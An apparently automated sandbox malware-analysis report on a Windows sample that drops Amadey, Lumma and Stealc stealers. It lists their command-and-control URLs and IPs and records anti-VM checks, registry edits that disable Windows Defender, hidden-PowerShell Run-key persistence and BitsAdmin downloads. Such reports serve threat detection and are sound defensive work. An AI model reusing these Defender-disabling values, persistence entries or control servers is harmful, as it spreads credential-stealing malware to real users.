Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
29-11-2024 00:04
Static task
static1
Behavioral task
behavioral1
Sample
BWDAN_file.exe
Resource
win7-20240903-en
General
-
Target
BWDAN_file.exe
-
Size
1.8MB
-
MD5
b3778394044fb4bd48df1134fc3768c9
-
SHA1
dcb60c2520fc805a10ac2db5c768b0532adda42b
-
SHA256
b0ebf31b0ded84953d0b471f380c0743832dc360eed391b5195c997d99f34d85
-
SHA512
36987385f0405da6fbf4d22517c34b5bef9dd8d798401f55735dbbb1c6b38f0d3fe3c7628e74218125903260e876a4ce68b6f79f5d915b4c4c7eb417b806371f
-
SSDEEP
49152:fbf1+D8s1ITM7ZzPqEdb9fyu7TwzLX8rkuDif4BTsU:fbsD8s1Waqw97TwXMrkuOf4B1
Malware Config
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
lumma
https://preside-comforter.sbs
https://savvy-steereo.sbs
https://copper-replace.sbs
https://record-envyp.sbs
https://slam-whipp.sbs
https://wrench-creter.sbs
https://looky-marked.sbs
https://plastic-mitten.sbs
https://tail-cease.cyou
Extracted
stealc
drum
http://185.215.113.206
-
url_path
/c4becf79229cb002.php
Extracted
lumma
https://tail-cease.cyou/api
Signatures
-
Amadey family
-
Lumma family
-
Processes:
b86d6eea98.exedescription ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection b86d6eea98.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" b86d6eea98.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" b86d6eea98.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" b86d6eea98.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" b86d6eea98.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" b86d6eea98.exe -
Stealc family
-
Enumerates VirtualBox registry keys 2 TTPs 2 IoCs
Processes:
86270a5637.exebd1341687e.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF 86270a5637.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF bd1341687e.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs
Processes:
3512b11913.exeBWDAN_file.exeb86d6eea98.exe86270a5637.exebd1341687e.exeskotes.exenbea1t8.exe2c0e47e036.exebbcd3df87f.exedescription ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3512b11913.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ BWDAN_file.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ b86d6eea98.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 86270a5637.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ bd1341687e.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ nbea1t8.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2c0e47e036.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ bbcd3df87f.exe -
Processes:
powershell.exepowershell.exepowershell.exepid Process 2700 powershell.exe 2096 powershell.exe 2044 powershell.exe 2096 powershell.exe 2044 powershell.exe -
Download via BitsAdmin 1 TTPs 2 IoCs
Processes:
bitsadmin.exebitsadmin.exepid Process 288 bitsadmin.exe 1580 bitsadmin.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 18 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
BWDAN_file.exeskotes.exeb86d6eea98.exebd1341687e.exenbea1t8.exe86270a5637.exe2c0e47e036.exebbcd3df87f.exe3512b11913.exedescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion BWDAN_file.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion b86d6eea98.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion b86d6eea98.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion bd1341687e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion BWDAN_file.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion nbea1t8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 86270a5637.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion nbea1t8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2c0e47e036.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2c0e47e036.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion bbcd3df87f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion bd1341687e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3512b11913.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3512b11913.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion bbcd3df87f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 86270a5637.exe -
Drops startup file 1 IoCs
Processes:
msiexec.exedescription ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SystemCare1.0.lnk msiexec.exe -
Executes dropped EXE 15 IoCs
Processes:
skotes.exenbea1t8.exetvtC9D3.exeuxN4wDZ.exeuxN4wDZ.exeTcMBq5M.exe2c0e47e036.exebbcd3df87f.exe3313b23224.exeSystemCare1.0.exeMSI304C.tmpb86d6eea98.exe86270a5637.exebd1341687e.exe3512b11913.exepid Process 2724 skotes.exe 2196 nbea1t8.exe 1064 tvtC9D3.exe 1792 uxN4wDZ.exe 2228 uxN4wDZ.exe 1360 TcMBq5M.exe 2132 2c0e47e036.exe 2276 bbcd3df87f.exe 2404 3313b23224.exe 2656 SystemCare1.0.exe 492 MSI304C.tmp 3972 b86d6eea98.exe 3180 86270a5637.exe 2360 bd1341687e.exe 1104 3512b11913.exe -
Identifies Wine through registry keys 2 TTPs 9 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
Processes:
3512b11913.exeskotes.exenbea1t8.exe2c0e47e036.exebbcd3df87f.exe86270a5637.exebd1341687e.exeBWDAN_file.exeb86d6eea98.exedescription ioc Process Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine 3512b11913.exe Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine nbea1t8.exe Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine 2c0e47e036.exe Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine bbcd3df87f.exe Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine 86270a5637.exe Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine bd1341687e.exe Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine BWDAN_file.exe Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine b86d6eea98.exe -
Loads dropped DLL 36 IoCs
Processes:
BWDAN_file.exeskotes.exetvtC9D3.exeuxN4wDZ.exeMsiExec.exeMsiExec.exeSystemCare1.0.exepid Process 1944 BWDAN_file.exe 1944 BWDAN_file.exe 2724 skotes.exe 2724 skotes.exe 1064 tvtC9D3.exe 1064 tvtC9D3.exe 2724 skotes.exe 2724 skotes.exe 1792 uxN4wDZ.exe 2724 skotes.exe 1068 MsiExec.exe 2724 skotes.exe 2724 skotes.exe 1656 MsiExec.exe 1656 MsiExec.exe 1656 MsiExec.exe 1656 MsiExec.exe 1656 MsiExec.exe 2724 skotes.exe 2656 SystemCare1.0.exe 2656 SystemCare1.0.exe 2656 SystemCare1.0.exe 2656 SystemCare1.0.exe 2656 SystemCare1.0.exe 2656 SystemCare1.0.exe 2656 SystemCare1.0.exe 2656 SystemCare1.0.exe 2656 SystemCare1.0.exe 2656 SystemCare1.0.exe 2656 SystemCare1.0.exe 2656 SystemCare1.0.exe 1064 tvtC9D3.exe 2724 skotes.exe 2724 skotes.exe 2724 skotes.exe 2724 skotes.exe -
Processes:
b86d6eea98.exedescription ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features b86d6eea98.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" b86d6eea98.exe -
Adds Run key to start application 2 TTPs 5 IoCs
Processes:
skotes.exenbea1t8.exedescription ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\3313b23224.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1010061001\\3313b23224.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\b86d6eea98.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1010062001\\b86d6eea98.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\1009905001\\nbea1t8.exe'\"" nbea1t8.exe Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\2c0e47e036.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1010059001\\2c0e47e036.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\bbcd3df87f.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1010060001\\bbcd3df87f.exe" skotes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exeTcMBq5M.exemsiexec.exedescription ioc Process File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\J: TcMBq5M.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\M: TcMBq5M.exe File opened (read-only) \??\R: TcMBq5M.exe File opened (read-only) \??\X: TcMBq5M.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\V: TcMBq5M.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\O: TcMBq5M.exe File opened (read-only) \??\S: TcMBq5M.exe File opened (read-only) \??\T: TcMBq5M.exe File opened (read-only) \??\W: TcMBq5M.exe File opened (read-only) \??\H: TcMBq5M.exe File opened (read-only) \??\L: TcMBq5M.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\E: TcMBq5M.exe File opened (read-only) \??\G: TcMBq5M.exe File opened (read-only) \??\N: TcMBq5M.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\A: TcMBq5M.exe File opened (read-only) \??\P: TcMBq5M.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\Y: TcMBq5M.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\B: TcMBq5M.exe File opened (read-only) \??\I: TcMBq5M.exe File opened (read-only) \??\Q: TcMBq5M.exe File opened (read-only) \??\Z: TcMBq5M.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\K: TcMBq5M.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\U: TcMBq5M.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\J: msiexec.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
Processes:
resource yara_rule behavioral1/files/0x000500000001a4fd-379.dat autoit_exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc Process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
Processes:
BWDAN_file.exeskotes.exenbea1t8.exe2c0e47e036.exebbcd3df87f.exeb86d6eea98.exe86270a5637.exebd1341687e.exe3512b11913.exepid Process 1944 BWDAN_file.exe 2724 skotes.exe 2196 nbea1t8.exe 2132 2c0e47e036.exe 2276 bbcd3df87f.exe 3972 b86d6eea98.exe 3180 86270a5637.exe 2360 bd1341687e.exe 1104 3512b11913.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
uxN4wDZ.exedescription pid Process procid_target PID 1792 set thread context of 2228 1792 uxN4wDZ.exe 41 -
Drops file in Windows directory 17 IoCs
Processes:
msiexec.exeBWDAN_file.exeDrvInst.exedescription ioc Process File opened for modification C:\Windows\Installer\MSI304C.tmp msiexec.exe File created C:\Windows\Installer\f78212a.ipi msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\f78212c.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI2C74.tmp msiexec.exe File created C:\Windows\Tasks\skotes.job BWDAN_file.exe File created C:\Windows\Installer\f782127.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI235B.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI228F.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI2984.tmp msiexec.exe File opened for modification C:\Windows\INF\setupapi.ev3 DrvInst.exe File opened for modification C:\Windows\INF\setupapi.ev1 DrvInst.exe File opened for modification C:\Windows\Installer\MSI2175.tmp msiexec.exe File opened for modification C:\Windows\Installer\f78212a.ipi msiexec.exe File opened for modification C:\Windows\INF\setupapi.dev.log DrvInst.exe File opened for modification C:\Windows\Installer\f782127.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI2465.tmp msiexec.exe -
Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 31 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
tvtC9D3.exeMsiExec.exetaskkill.exeb86d6eea98.exeTcMBq5M.exebbcd3df87f.exeMSI304C.tmpSystemCare1.0.execmd.exepowershell.exebitsadmin.exetaskkill.exe2c0e47e036.exeMsiExec.exetaskkill.exetaskkill.exeBWDAN_file.exeping.exemsiexec.exetaskkill.exe86270a5637.exeskotes.exebitsadmin.exeuxN4wDZ.exepowershell.exe3512b11913.exeschtasks.exebd1341687e.exeuxN4wDZ.exepowershell.exe3313b23224.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tvtC9D3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language b86d6eea98.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TcMBq5M.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bbcd3df87f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSI304C.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SystemCare1.0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2c0e47e036.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BWDAN_file.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ping.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 86270a5637.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language uxN4wDZ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3512b11913.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bd1341687e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language uxN4wDZ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3313b23224.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
firefox.exedescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe -
Kills process with taskkill 5 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid Process 2216 taskkill.exe 3040 taskkill.exe 2116 taskkill.exe 780 taskkill.exe 2368 taskkill.exe -
Modifies data under HKEY_USERS 43 IoCs
Processes:
DrvInst.exedescription ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates DrvInst.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople DrvInst.exe -
Modifies registry class 1 IoCs
Processes:
firefox.exedescription ioc Process Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_Classes\Local Settings firefox.exe -
Processes:
uxN4wDZ.exe2c0e47e036.exedescription ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 uxN4wDZ.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432